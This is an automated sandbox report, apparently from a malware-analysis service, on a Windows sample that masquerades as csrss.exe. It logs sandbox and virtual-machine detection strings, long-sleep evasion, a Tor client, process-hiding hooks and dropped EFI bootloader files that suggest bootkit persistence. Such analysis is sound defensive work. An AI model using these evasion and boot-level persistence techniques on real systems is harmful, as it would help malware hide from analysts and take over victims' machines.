        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8520Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9036Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep count: 8562 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5028Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8868Thread sleep count: 8504 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9076Thread sleep count: 8214 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9128Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep count: 8248 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 8222 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2816Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 7947 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 1488Thread sleep time: -370000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8504
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8597
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8368
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8562
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8327
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8260
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8504
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8214
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8294
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8248
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8413
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8222
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7947
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeWindow / User API: threadDelayed 370
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile opened / queried: VBoxGuest
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile opened / queried: vmci
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile opened / queried: HGFS
